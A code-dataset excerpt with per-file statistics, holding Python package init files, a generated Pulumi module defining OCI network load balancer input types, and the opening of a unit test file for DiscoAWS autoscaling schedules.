| 16.8 | 49 | 0.702381 | 25 | 168 | 4.68 | 0.56 | 0.119658 | 0.25641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160714 | 168 | 9 | 50 | 18.666667 | 0.829787 | 0 | 0 | 0 | 0 | 0 | 0.107784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5b718bbea896387139a74673f7566c21db91a29 | 49 | py | Python | Chapter-4A/charter/__init__.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | [
"MIT"
] | null | null | null | Chapter-4A/charter/__init__.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | [
"MIT"
] | null | null | null | Chapter-4A/charter/__init__.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | [
"MIT"
] | null | null | null | from .chart import *
from .generator import * | 24.5 | 24 | 0.693878 | 6 | 49 | 5.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.22449 | 49 | 2 | 25 | 24.5 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
912b7c31de01e9cb509c06493f6dc00c09f87ec0 | 26,969 | py | Python | sdk/python/pulumi_oci/networkloadbalancer/_inputs.py | EladGabay/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2021-08-17T11:14:46.000Z | 2021-12-31T02:07:03.000Z | sdk/python/pulumi_oci/networkloadbalancer/_inputs.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-09-06T11:21:29.000Z | 2021-09-06T11:21:29.000Z | sdk/python/pulumi_oci/networkloadbalancer/_inputs.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-08-24T23:31:30.000Z | 2022-01-02T19:26:54.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'BackendSetBackendArgs',
'BackendSetHealthCheckerArgs',
'NetworkLoadBalancerIpAddressArgs',
'NetworkLoadBalancerIpAddressReservedIpArgs',
'NetworkLoadBalancerReservedIpArgs',
'GetBackendSetsFilterArgs',
'GetBackendsFilterArgs',
'GetListenersFilterArgs',
'GetNetworkLoadBalancersFilterArgs',
'GetNetworkLoadBalancersPoliciesFilterArgs',
'GetNetworkLoadBalancersProtocolsFilterArgs',
]
@pulumi.input_type
class BackendSetBackendArgs:
def __init__(__self__, *,
port: pulumi.Input[int],
ip_address: Optional[pulumi.Input[str]] = None,
is_backup: Optional[pulumi.Input[bool]] = None,
is_drain: Optional[pulumi.Input[bool]] = None,
is_offline: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
target_id: Optional[pulumi.Input[str]] = None,
weight: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] port: (Updatable) The backend server port against which to run the health check. If the port is not specified, then the network load balancer uses the port information from the `Backend` object. The port must be specified if the backend port is 0. Example: `8080`
:param pulumi.Input[str] ip_address: The IP address of the backend server. Example: `10.0.0.3`
:param pulumi.Input[bool] is_backup: Whether the network load balancer should treat this server as a backup unit. If `true`, then the network load balancer forwards no ingress traffic to this backend server unless all other backend servers not marked as "isBackup" fail the health check policy. Example: `false`
:param pulumi.Input[bool] is_drain: Whether the network load balancer should drain this server. Servers marked "isDrain" receive no incoming traffic. Example: `false`
:param pulumi.Input[bool] is_offline: Whether the network load balancer should treat this server as offline. Offline servers receive no incoming traffic. Example: `false`
:param pulumi.Input[str] name: A user-friendly name for the backend set that must be unique and cannot be changed.
:param pulumi.Input[str] target_id: The IP OCID/Instance OCID associated with the backend server. Example: `ocid1.privateip..oc1.<var><unique_ID></var>`
:param pulumi.Input[int] weight: The network load balancing policy weight assigned to the server. Backend servers with a higher weight receive a larger proportion of incoming traffic. For example, a server weighted '3' receives three times the number of new connections as a server weighted '1'. For more information about load balancing policies, see [How Network Load Balancing Policies Work](https://docs.cloud.oracle.com/iaas/Content/Balance/Reference/lbpolicies.htm). Example: `3`
"""
pulumi.set(__self__, "port", port)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_backup is not None:
pulumi.set(__self__, "is_backup", is_backup)
if is_drain is not None:
pulumi.set(__self__, "is_drain", is_drain)
if is_offline is not None:
pulumi.set(__self__, "is_offline", is_offline)
if name is not None:
pulumi.set(__self__, "name", name)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
if weight is not None:
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
(Updatable) The backend server port against which to run the health check. If the port is not specified, then the network load balancer uses the port information from the `Backend` object. The port must be specified if the backend port is 0. Example: `8080`
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address of the backend server. Example: `10.0.0.3`
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isBackup")
def is_backup(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the network load balancer should treat this server as a backup unit. If `true`, then the network load balancer forwards no ingress traffic to this backend server unless all other backend servers not marked as "isBackup" fail the health check policy. Example: `false`
"""
return pulumi.get(self, "is_backup")
@is_backup.setter
def is_backup(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_backup", value)
@property
@pulumi.getter(name="isDrain")
def is_drain(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the network load balancer should drain this server. Servers marked "isDrain" receive no incoming traffic. Example: `false`
"""
return pulumi.get(self, "is_drain")
@is_drain.setter
def is_drain(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_drain", value)
@property
@pulumi.getter(name="isOffline")
def is_offline(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the network load balancer should treat this server as offline. Offline servers receive no incoming traffic. Example: `false`
"""
return pulumi.get(self, "is_offline")
@is_offline.setter
def is_offline(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_offline", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A user-friendly name for the backend set that must be unique and cannot be changed.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="targetId")
def target_id(self) -> Optional[pulumi.Input[str]]:
"""
The IP OCID/Instance OCID associated with the backend server. Example: `ocid1.privateip..oc1.<var><unique_ID></var>`
"""
return pulumi.get(self, "target_id")
@target_id.setter
def target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_id", value)
@property
@pulumi.getter
def weight(self) -> Optional[pulumi.Input[int]]:
"""
The network load balancing policy weight assigned to the server. Backend servers with a higher weight receive a larger proportion of incoming traffic. For example, a server weighted '3' receives three times the number of new connections as a server weighted '1'. For more information about load balancing policies, see [How Network Load Balancing Policies Work](https://docs.cloud.oracle.com/iaas/Content/Balance/Reference/lbpolicies.htm). Example: `3`
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "weight", value)
@pulumi.input_type
class BackendSetHealthCheckerArgs:
def __init__(__self__, *,
protocol: pulumi.Input[str],
interval_in_millis: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
request_data: Optional[pulumi.Input[str]] = None,
response_body_regex: Optional[pulumi.Input[str]] = None,
response_data: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
return_code: Optional[pulumi.Input[int]] = None,
timeout_in_millis: Optional[pulumi.Input[int]] = None,
url_path: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] protocol: (Updatable) The protocol the health check must use; either HTTP or HTTPS, or UDP or TCP. Example: `HTTP`
:param pulumi.Input[int] interval_in_millis: (Updatable) The interval between health checks, in milliseconds. The default value is 10000 (10 seconds). Example: `10000`
:param pulumi.Input[int] port: (Updatable) The backend server port against which to run the health check. If the port is not specified, then the network load balancer uses the port information from the `Backend` object. The port must be specified if the backend port is 0. Example: `8080`
:param pulumi.Input[str] request_data: (Updatable) Base64 encoded pattern to be sent as UDP or TCP health check probe.
:param pulumi.Input[str] response_body_regex: (Updatable) A regular expression for parsing the response body from the backend server. Example: `^((?!false).|\s)*$`
:param pulumi.Input[str] response_data: (Updatable) Base64 encoded pattern to be validated as UDP or TCP health check probe response.
:param pulumi.Input[int] retries: (Updatable) The number of retries to attempt before a backend server is considered "unhealthy". This number also applies when recovering a server to the "healthy" state. The default value is 3. Example: `3`
:param pulumi.Input[int] return_code: (Updatable) The status code a healthy backend server should return. If you configure the health check policy to use the HTTP protocol, then you can use common HTTP status codes such as "200". Example: `200`
:param pulumi.Input[int] timeout_in_millis: (Updatable) The maximum time, in milliseconds, to wait for a reply to a health check. A health check is successful only if a reply returns within this timeout period. The default value is 3000 (3 seconds). Example: `3000`
:param pulumi.Input[str] url_path: (Updatable) The path against which to run the health check. Example: `/healthcheck`
"""
pulumi.set(__self__, "protocol", protocol)
if interval_in_millis is not None:
pulumi.set(__self__, "interval_in_millis", interval_in_millis)
if port is not None:
pulumi.set(__self__, "port", port)
if request_data is not None:
pulumi.set(__self__, "request_data", request_data)
if response_body_regex is not None:
pulumi.set(__self__, "response_body_regex", response_body_regex)
if response_data is not None:
pulumi.set(__self__, "response_data", response_data)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if return_code is not None:
pulumi.set(__self__, "return_code", return_code)
if timeout_in_millis is not None:
pulumi.set(__self__, "timeout_in_millis", timeout_in_millis)
if url_path is not None:
pulumi.set(__self__, "url_path", url_path)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
"""
(Updatable) The protocol the health check must use; either HTTP or HTTPS, or UDP or TCP. Example: `HTTP`
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="intervalInMillis")
def interval_in_millis(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The interval between health checks, in milliseconds. The default value is 10000 (10 seconds). Example: `10000`
"""
return pulumi.get(self, "interval_in_millis")
@interval_in_millis.setter
def interval_in_millis(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval_in_millis", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The backend server port against which to run the health check. If the port is not specified, then the network load balancer uses the port information from the `Backend` object. The port must be specified if the backend port is 0. Example: `8080`
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="requestData")
def request_data(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Base64 encoded pattern to be sent as UDP or TCP health check probe.
"""
return pulumi.get(self, "request_data")
@request_data.setter
def request_data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_data", value)
@property
@pulumi.getter(name="responseBodyRegex")
def response_body_regex(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A regular expression for parsing the response body from the backend server. Example: `^((?!false).|\s)*$`
"""
return pulumi.get(self, "response_body_regex")
@response_body_regex.setter
def response_body_regex(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response_body_regex", value)
@property
@pulumi.getter(name="responseData")
def response_data(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Base64 encoded pattern to be validated as UDP or TCP health check probe response.
"""
return pulumi.get(self, "response_data")
@response_data.setter
def response_data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response_data", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The number of retries to attempt before a backend server is considered "unhealthy". This number also applies when recovering a server to the "healthy" state. The default value is 3. Example: `3`
"""
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="returnCode")
def return_code(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The status code a healthy backend server should return. If you configure the health check policy to use the HTTP protocol, then you can use common HTTP status codes such as "200". Example: `200`
"""
return pulumi.get(self, "return_code")
@return_code.setter
def return_code(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "return_code", value)
@property
@pulumi.getter(name="timeoutInMillis")
def timeout_in_millis(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The maximum time, in milliseconds, to wait for a reply to a health check. A health check is successful only if a reply returns within this timeout period. The default value is 3000 (3 seconds). Example: `3000`
"""
return pulumi.get(self, "timeout_in_millis")
@timeout_in_millis.setter
def timeout_in_millis(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout_in_millis", value)
@property
@pulumi.getter(name="urlPath")
def url_path(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The path against which to run the health check. Example: `/healthcheck`
"""
return pulumi.get(self, "url_path")
@url_path.setter
def url_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_path", value)
@pulumi.input_type
class NetworkLoadBalancerIpAddressArgs:
def __init__(__self__, *,
ip_address: Optional[pulumi.Input[str]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
reserved_ip: Optional[pulumi.Input['NetworkLoadBalancerIpAddressReservedIpArgs']] = None):
"""
:param pulumi.Input[str] ip_address: An IP address. Example: `192.168.0.3`
:param pulumi.Input[bool] is_public: Whether the IP address is public or private.
:param pulumi.Input['NetworkLoadBalancerIpAddressReservedIpArgs'] reserved_ip: An object representing a reserved IP address to be attached or that is already attached to a network load balancer.
"""
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if reserved_ip is not None:
pulumi.set(__self__, "reserved_ip", reserved_ip)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
An IP address. Example: `192.168.0.3`
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the IP address is public or private.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter(name="reservedIp")
def reserved_ip(self) -> Optional[pulumi.Input['NetworkLoadBalancerIpAddressReservedIpArgs']]:
"""
An object representing a reserved IP address to be attached or that is already attached to a network load balancer.
"""
return pulumi.get(self, "reserved_ip")
@reserved_ip.setter
def reserved_ip(self, value: Optional[pulumi.Input['NetworkLoadBalancerIpAddressReservedIpArgs']]):
pulumi.set(self, "reserved_ip", value)
@pulumi.input_type
class NetworkLoadBalancerIpAddressReservedIpArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: OCID of the reserved public IP address created with the virtual cloud network.
"""
if id is not None:
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
OCID of the reserved public IP address created with the virtual cloud network.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@pulumi.input_type
class NetworkLoadBalancerReservedIpArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: OCID of the reserved public IP address created with the virtual cloud network.
"""
if id is not None:
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
OCID of the reserved public IP address created with the virtual cloud network.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@pulumi.input_type
class GetBackendSetsFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
"""
:param str name: A user-friendly name for the backend set that must be unique and cannot be changed.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
"""
A user-friendly name for the backend set that must be unique and cannot be changed.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetBackendsFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
"""
:param str name: A read-only field showing the IP address/IP OCID and port that uniquely identify this backend server in the backend set. Example: `10.0.0.3:8080`, or `ocid1.privateip..oc1.<var><unique_ID></var>:443` or `10.0.0.3:0`
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
"""
A read-only field showing the IP address/IP OCID and port that uniquely identify this backend server in the backend set. Example: `10.0.0.3:8080`, or `ocid1.privateip..oc1.<var><unique_ID></var>:443` or `10.0.0.3:0`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetListenersFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
"""
:param str name: A friendly name for the listener. It must be unique and it cannot be changed. Example: `example_listener`
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
"""
A friendly name for the listener. It must be unique and it cannot be changed. Example: `example_listener`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetNetworkLoadBalancersFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetNetworkLoadBalancersPoliciesFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
@pulumi.input_type
class GetNetworkLoadBalancersProtocolsFilterArgs:
def __init__(__self__, *,
name: str,
values: Sequence[str],
regex: Optional[bool] = None):
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "values", values)
if regex is not None:
pulumi.set(__self__, "regex", regex)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def regex(self) -> Optional[bool]:
return pulumi.get(self, "regex")
@regex.setter
def regex(self, value: Optional[bool]):
pulumi.set(self, "regex", value)
| 39.777286 | 494 | 0.646112 | 3,403 | 26,969 | 4.98707 | 0.079636 | 0.066761 | 0.062813 | 0.045902 | 0.849862 | 0.774144 | 0.733133 | 0.692063 | 0.676978 | 0.653821 | 0 | 0.007978 | 0.242389 | 26,969 | 677 | 495 | 39.836041 | 0.822631 | 0.322741 | 0 | 0.597315 | 1 | 0 | 0.087862 | 0.026768 | 0 | 0 | 0 | 0 | 0 | 1 | 0.208054 | false | 0 | 0.011186 | 0.033557 | 0.33557 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6a02049e1e7e3f9f9f270de2a17c0dc10dcbbd2 | 47 | py | Python | rmipipeline/__init__.py | mri-group-opbg/mri-pipelines | 0bc23e04717b6f92b8c270d9d44cd65e7f9f538c | [
"Apache-2.0"
] | null | null | null | rmipipeline/__init__.py | mri-group-opbg/mri-pipelines | 0bc23e04717b6f92b8c270d9d44cd65e7f9f538c | [
"Apache-2.0"
] | null | null | null | rmipipeline/__init__.py | mri-group-opbg/mri-pipelines | 0bc23e04717b6f92b8c270d9d44cd65e7f9f538c | [
"Apache-2.0"
] | null | null | null | from .tasks import *
from .kubernetes import *
| 15.666667 | 25 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 26 | 23.5 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e6e46f764c5b0557f956d8c6aea1ba30d09eccca | 46,181 | py | Python | tests/unit/test_disco_aws.py | amplifylitco/asiaq | a1a292f6e9cbf32a30242405e4947b17910e5369 | [
"BSD-2-Clause"
] | 27 | 2016-03-08T16:50:22.000Z | 2018-11-26T06:33:25.000Z | tests/unit/test_disco_aws.py | amplifylitco/asiaq | a1a292f6e9cbf32a30242405e4947b17910e5369 | [
"BSD-2-Clause"
] | 202 | 2016-03-08T17:13:08.000Z | 2019-02-01T00:49:06.000Z | tests/unit/test_disco_aws.py | amplify-education/asiaq | fb6004bc4da0acef40e7bc18b148db4f72fa2f32 | [
"BSD-2-Clause"
] | 2 | 2016-03-17T18:52:37.000Z | 2016-10-06T20:36:37.000Z | """
Tests of disco_aws
"""
from __future__ import print_function
from unittest import TestCase, skip
from datetime import datetime
from datetime import timedelta
import boto.ec2.instance
from boto.exception import EC2ResponseError
from mock import MagicMock, call, patch, create_autospec
from moto import mock_elb
from disco_aws_automation import DiscoAWS
from disco_aws_automation.exceptions import TimeoutError, SmokeTestError
from disco_aws_automation.disco_elb import DiscoELBPortConfig, DiscoELBPortMapping
from tests.helpers.patch_disco_aws import (patch_disco_aws,
get_default_config_dict,
get_mock_config,
TEST_ENV_NAME)
def _get_meta_network_mock():
ret = MagicMock()
ret.security_group = MagicMock()
ret.security_group.id = "sg-1234abcd"
ret.disco_subnets = {}
for _ in xrange(3):
zone_name = 'zone{0}'.format(_)
ret.disco_subnets[zone_name] = MagicMock()
ret.disco_subnets[zone_name].subnet_dict = dict()
ret.disco_subnets[zone_name].subnet_dict['SubnetId'] = "s-1234abcd"
return MagicMock(return_value=ret)
# Not every test will use the mocks in **kwargs, so disable the unused argument warning
# pylint: disable=W0613
class DiscoAWSTests(TestCase):
'''Test DiscoAWS class'''
def setUp(self):
self.instance = create_autospec(boto.ec2.instance.Instance)
self.instance.state = "running"
self.instance.tags = create_autospec(boto.ec2.tag.TagSet)
self.instance.id = "i-12345678"
@patch_disco_aws
def test_create_scaling_schedule_only_desired(self, mock_config, **kwargs):
"""test create_scaling_schedule with only desired schedule"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, discogroup=MagicMock())
aws.create_scaling_schedule("1", "2@1 0 * * *:3@6 0 * * *", "5", hostclass="mhcboo")
aws.discogroup.assert_has_calls([
call.delete_all_recurring_group_actions(hostclass='mhcboo', group_name=None),
call.create_recurring_group_action('1 0 * * *', hostclass='mhcboo', group_name=None,
min_size=None, desired_capacity=2, max_size=None),
call.create_recurring_group_action('6 0 * * *', hostclass='mhcboo', group_name=None,
min_size=None, desired_capacity=3, max_size=None)
], any_order=True)
@patch_disco_aws
def test_create_scaling_schedule_no_sched(self, mock_config, **kwargs):
"""test create_scaling_schedule with only desired schedule"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, discogroup=MagicMock())
aws.create_scaling_schedule("1", "2", "5", hostclass="mhcboo")
aws.discogroup.assert_has_calls([
call.delete_all_recurring_group_actions(hostclass='mhcboo', group_name=None)
])
@patch_disco_aws
def test_create_scaling_schedule_overlapping(self, mock_config, **kwargs):
"""test create_scaling_schedule with only desired schedule"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, discogroup=MagicMock())
aws.create_scaling_schedule(
"1@1 0 * * *:2@6 0 * * *",
"2@1 0 * * *:3@6 0 * * *",
"6@1 0 * * *:9@6 0 * * *",
hostclass="mhcboo"
)
aws.discogroup.assert_has_calls([
call.delete_all_recurring_group_actions(hostclass='mhcboo', group_name=None),
call.create_recurring_group_action('1 0 * * *', hostclass='mhcboo', group_name=None,
min_size=1, desired_capacity=2, max_size=6),
call.create_recurring_group_action('6 0 * * *', hostclass='mhcboo', group_name=None,
min_size=2, desired_capacity=3, max_size=9)
], any_order=True)
@patch_disco_aws
def test_create_scaling_schedule_mixed(self, mock_config, **kwargs):
"""test create_scaling_schedule with only desired schedule"""
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME, discogroup=MagicMock())
aws.create_scaling_schedule(
"1@1 0 * * *:2@7 0 * * *",
"2@1 0 * * *:3@6 0 * * *",
"6@2 0 * * *:9@6 0 * * *",
hostclass="mhcboo"
)
aws.discogroup.assert_has_calls([
call.delete_all_recurring_group_actions(hostclass='mhcboo', group_name=None),
call.create_recurring_group_action('1 0 * * *', hostclass='mhcboo', group_name=None,
min_size=1, desired_capacity=2, max_size=None),
call.create_recurring_group_action('2 0 * * *', hostclass='mhcboo', group_name=None,
min_size=None, desired_capacity=None, max_size=6),
call.create_recurring_group_action('6 0 * * *', hostclass='mhcboo', group_name=None,
min_size=None, desired_capacity=3, max_size=9),
call.create_recurring_group_action('7 0 * * *', hostclass='mhcboo', group_name=None,
min_size=2, desired_capacity=None, max_size=None)
], any_order=True)
def _get_image_mock(self, aws):
reservation = aws.connection.run_instances('ami-1234abcd')
instance = reservation.instances[0]
mock_ami = MagicMock()
mock_ami.id = aws.connection.create_image(instance.id, "test-ami", "this is a test ami")
return mock_ami
@skip("Broken due to boto3 upgrade. Need to refactor this test")
@patch_disco_aws
def test_provision_hostclass_simple(self, mock_config, **kwargs):
"""
Provision creates the proper launch configuration and autoscaling group
"""
